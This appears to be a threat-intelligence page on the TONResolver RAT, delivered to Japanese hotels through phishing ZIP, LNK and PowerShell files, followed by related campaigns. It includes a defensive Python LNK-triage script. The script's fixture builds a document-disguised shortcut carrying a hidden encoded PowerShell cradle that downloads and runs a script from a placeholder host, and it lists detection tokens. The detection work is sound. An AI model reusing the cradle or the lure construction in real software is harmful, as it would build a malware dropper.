TONResolver RAT delivered via ZIP, LNK, and PowerShell
Malware Activity
Summary
The TONResolver implant was delivered through a ZIP/LNK/PowerShell chain that can establish a remote access trojan foothold and give the operator command execution on the host. The payload, tracked as TrojanSpy.JS.TONRESOLVER.A, is built for follow-on compromise rather than nuisance behavior. It resolves its command-and-control location through the TON blockchain, so the operator can switch C2 infrastructure without the hard-coded domains or addresses that blocklists and takedowns depend on. The delivery and obfuscation layers raise the cost of inspection, containment, and takedown.
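The LNK stage of the chain above is where a defender can catch this cheaply, because a shortcut that pretends to be a document still has to carry the PowerShell path and its arguments in clear, parseable StringData fields. The following is an added example, not code from the report, the campaign or the malware: a minimal MS-SHLLINK parser that pulls the target, arguments and icon out of a .lnk, decodes an -EncodedCommand payload, and scores the generic lure traits (a LOLBin target, a hidden or minimized window, an encoded download cradle, a document icon on an executable target). The sample shortcut is constructed inside the block with a placeholder URL; it does not reproduce the campaign's actual shortcut, command line or infrastructure, and the heuristics are generic, not signatures from the report.

```python
import base64
import re
import struct

# LinkFlags bits and the Shell Link CLSID from MS-SHLLINK section 2.1
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

# Generic LNK-lure heuristics (assumptions for this example, not indicators from the report)
LOLBINS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32", "regsvr32")
SUSPICIOUS_TOKENS = ("-w hidden", "-windowstyle hidden", "-nop ", "-noprofile", "-ep bypass",
                     "-executionpolicy bypass", "iex", "invoke-expression", "downloadstring",
                     "invoke-webrequest", "frombase64string")
DOC_ICON_HINTS = (".pdf", ".doc", ".xls", "acrobat", "acrord32", "winword", "excel")
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus the StringData fields of a Shell Link file."""
    if (len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"flags": flags, "show_command": struct.unpack_from("<I", data, 60)[0]}
    off = 0x4C                                   # end of the fixed 76-byte header
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (u16) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (u32) counts itself
        off += struct.unpack_from("<I", data, off)[0]
    for bit, name in STRING_FIELDS:              # CountCharacters (u16) + chars, no NUL
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            fields[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[name] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return fields


def triage_lnk(data: bytes) -> dict:
    """Parse a .lnk and flag the marks of a PowerShell launcher hiding behind a document icon."""
    f = parse_lnk(data)
    target = f"{f.get('relative_path', '')} {f.get('arguments', '')}"
    decoded = None
    m = ENC_RE.search(f.get("arguments", ""))
    if m:                                        # -EncodedCommand is base64 of UTF-16LE text
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            decoded = None
    haystack = f"{target} {decoded or ''}".lower()
    indicators = []
    if any(b in target.lower() for b in LOLBINS):
        indicators.append("lolbin-target")
    if m:
        indicators.append("encoded-command" if decoded else "encoded-command-undecodable")
    indicators += [t.strip() for t in SUSPICIOUS_TOKENS if t in haystack]
    if f["show_command"] == 7:                   # SW_SHOWMINNOACTIVE: console never shown
        indicators.append("show-minimized")
    icon = f.get("icon_location", "").lower()
    if "lolbin-target" in indicators and any(h in icon for h in DOC_ICON_HINTS):
        indicators.append("document-icon-masquerade")
    verdict = "suspicious" if {"lolbin-target", "encoded-command"} & set(indicators) else "clean"
    return {"fields": f, "decoded_command": decoded, "indicators": indicators, "verdict": verdict}


def build_lnk(relative_path="", arguments="", icon_location="", name="", show_command=1) -> bytes:
    """Construct a minimal valid Shell Link to exercise the parser (a fixture, not a real sample)."""
    flags = IS_UNICODE | HAS_LINK_TARGET_ID_LIST
    body = struct.pack("<H", 2) + b"\x00\x00"   # IDList holding only the TerminalID
    values = {"name": name, "relative_path": relative_path,
              "arguments": arguments, "icon_location": icon_location}
    for bit, field in STRING_FIELDS:
        value = values.get(field, "")
        if value:
            flags |= bit
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + body


# Constructed lure: a "guest complaint" shortcut dressed as a PDF that runs an encoded
# PowerShell download cradle. The URL is a placeholder, not an indicator from the report.
STAGE_TWO = "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
SAMPLE_LNK = build_lnk(
    name="Guest complaint 0630.pdf",
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments="-nop -w hidden -ep bypass -enc "
              + base64.b64encode(STAGE_TWO.encode("utf-16-le")).decode(),
    icon_location=r"%ProgramFiles%\Adobe\Acrobat\Acrobat.exe",
    show_command=7,
)

if __name__ == "__main__":
    result = triage_lnk(SAMPLE_LNK)
    print(result["verdict"], result["indicators"])
    print("decoded:", result["decoded_command"])
```

Run `triage_lnk` over every .lnk extracted from a suspect archive before anyone double-clicks it. The parser only needs LinkFlags to locate the StringData, so it also copes with real-world shortcuts that carry an IDList or LinkInfo block (both are skipped by size, not interpreted), and a decoded -EncodedCommand gives you the second-stage URL or script to block and hunt for.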
Related Happenings
Booking.com partner accommodation phishing campaign targeting Japan
Campaign
H score: 32
First: 30.06.2026 13:30
Last: 30.06.2026 13:30
Sources: 1
How related:
Cyber threat actors are targeting employees of Booking.com partner accommodations in Japan, using phishing emails that impersonate guest complaints and review requests to trick hotel staff into executing malicious files.
About this happening:
A **phishing campaign** is targeting **Booking.com partner accommodations in Japan** with guest-complaint and review-request lures that deliver **malicious files** for **TONResolv...
TonRAT Node.js implant with TON blockchain C2
Malware Activity
H score: 24
First: 26.06.2026 12:27
Last: 26.06.2026 12:27
Sources: 1
About this happening:
**TonRAT** is using a **Node.js implant** to hide command-and-control lookups behind the **TON blockchain API**, increasing the chance that blocking and detection will fail. The a...
OXLOADER loader stages CastleStealer via UAC prompting and DLL side-loading
Malware Activity
H score: 20
First: 22.06.2026 16:20
Last: 22.06.2026 16:20
Sources: 1
About this happening:
The **OXLOADER** malware activity now shows a **loader** delivering **CastleStealer** through **PowerShell**, **UAC** prompting, and **DLL side-loading**, giving the stealer a ste...
RemotePE memory-only RAT activity by Lazarus Group targeting financial and cryptocurrency organizations
Malware Activity
H score: 28
First: 25.05.2026 12:32
Last: 25.05.2026 12:32
Sources: 1
About this happening:
The **RemotePE** malware has been tied to **Lazarus Group** activity against **financial and cryptocurrency organizations**, raising the risk of stealthy long-term access and late...
OAuth-phished ZIP/LNK/PowerShell malware delivery chain
Malware Activity
H score: 19
First: 03.03.2026 11:20
Last: 03.03.2026 11:20
Sources: 1
About this happening:
**ZIP-delivered malware** now uses a **PowerShell** and **DLL side-loading** chain to infect Windows devices and reach an external **C2 server**, increasing the risk of follow-on...
Timeline
- 30.06.2026 13:30 · 2 articles
TONResolver RAT delivered via ZIP, LNK, and PowerShell
Initial Disclosure: A **phishing-delivered ZIP file** contained a disguised **LNK** shortcut that launched **TrojanSpy.JS.TONRESOLVER.A** through a **PowerShell** script. That first stage established the malware's initial foothold and set up persistent access for later commands.
Sources:
- Hackers Leverage Blockchain to Hit Japan's Hotels Through Booking.com Phishing — www.infosecurity-magazine.com — 30.06.2026 13:30